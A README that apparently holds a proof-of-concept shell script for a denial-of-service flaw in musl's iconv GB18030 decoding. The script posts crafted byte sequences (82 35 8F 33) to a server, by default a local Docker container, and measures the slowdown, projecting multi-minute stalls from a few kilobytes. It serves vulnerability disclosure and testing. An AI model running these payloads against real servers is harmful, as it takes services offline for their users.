README.md
Rendering markdown...
#!/bin/sh
#
# test.sh - Send benign and adversarial GB18030 payloads to the server
#
# Run this from your HOST machine while the Docker container is running.
# The server should be at localhost:8080.
set -e
HOST="${1:-localhost:8080}"
echo "=== musl iconv DoS - End-to-End Test ==="
echo "Target: $HOST"
echo ""
# Generate benign payload: 100 copies of 81 30 81 30 (400 bytes)
printf '\x81\x30\x81\x30%.0s' $(seq 1 100) > /tmp/benign.bin
BENIGN_SIZE=$(wc -c < /tmp/benign.bin)
echo "--- Benign payload: $BENIGN_SIZE bytes (100 chars) ---"
echo -n "Sending... "
START=$(date +%s%N 2>/dev/null || python3 -c 'import time; print(int(time.time()*1e9))')
RESP_BENIGN=$(curl -s -w "\nHTTP_TIME=%{time_total}" \
-X POST \
-H "Content-Type: text/plain; charset=gb18030" \
--data-binary @/tmp/benign.bin \
"http://$HOST/" 2>&1)
echo "Done"
echo "$RESP_BENIGN" | head -5
BENIGN_TIME=$(echo "$RESP_BENIGN" | grep "HTTP_TIME=" | cut -d= -f2)
echo "curl wall time: ${BENIGN_TIME}s"
echo ""
# Generate adversarial payload: just 5 copies of 82 35 8F 33 (20 bytes)
# Even 5 chars should take >1 second
printf '\x82\x35\x8F\x33%.0s' $(seq 1 5) > /tmp/adversarial_small.bin
ADV_SMALL_SIZE=$(wc -c < /tmp/adversarial_small.bin)
echo "--- Adversarial payload (small): $ADV_SMALL_SIZE bytes (5 chars) ---"
echo " Expected: ~1.3 seconds (5 * 0.26s per char)"
echo -n "Sending... "
RESP_ADV=$(curl -s -w "\nHTTP_TIME=%{time_total}" \
-X POST \
-H "Content-Type: text/plain; charset=gb18030" \
--data-binary @/tmp/adversarial_small.bin \
--max-time 30 \
"http://$HOST/" 2>&1)
echo "Done"
echo "$RESP_ADV" | head -5
ADV_TIME=$(echo "$RESP_ADV" | grep "HTTP_TIME=" | cut -d= -f2)
echo "curl wall time: ${ADV_TIME}s"
echo ""
# Generate medium adversarial payload: 20 copies (80 bytes)
printf '\x82\x35\x8F\x33%.0s' $(seq 1 20) > /tmp/adversarial_med.bin
ADV_MED_SIZE=$(wc -c < /tmp/adversarial_med.bin)
echo "--- Adversarial payload (medium): $ADV_MED_SIZE bytes (20 chars) ---"
echo " Expected: ~5.2 seconds (20 * 0.26s per char)"
echo -n "Sending (30s timeout)... "
RESP_ADV_MED=$(curl -s -w "\nHTTP_TIME=%{time_total}" \
-X POST \
-H "Content-Type: text/plain; charset=gb18030" \
--data-binary @/tmp/adversarial_med.bin \
--max-time 30 \
"http://$HOST/" 2>&1)
echo "Done"
echo "$RESP_ADV_MED" | head -5
ADV_MED_TIME=$(echo "$RESP_ADV_MED" | grep "HTTP_TIME=" | cut -d= -f2)
echo "curl wall time: ${ADV_MED_TIME}s"
echo ""
echo "=== Summary ==="
echo "Benign (400 bytes, 100 chars): ${BENIGN_TIME}s"
echo "Adversarial (20 bytes, 5 chars): ${ADV_TIME}s"
echo "Adversarial (80 bytes, 20 chars): ${ADV_MED_TIME}s"
echo ""
echo "If adversarial times are orders of magnitude slower than benign,"
echo "the vulnerability is confirmed end-to-end."
echo ""
echo "Projected:"
echo " 100 adversarial chars (400 bytes): ~26 seconds"
echo " 1000 adversarial chars (4 KB): ~4.3 minutes"
echo " 10000 adversarial chars (40 KB): ~43 minutes"
# Cleanup
rm -f /tmp/benign.bin /tmp/adversarial_small.bin /tmp/adversarial_med.bin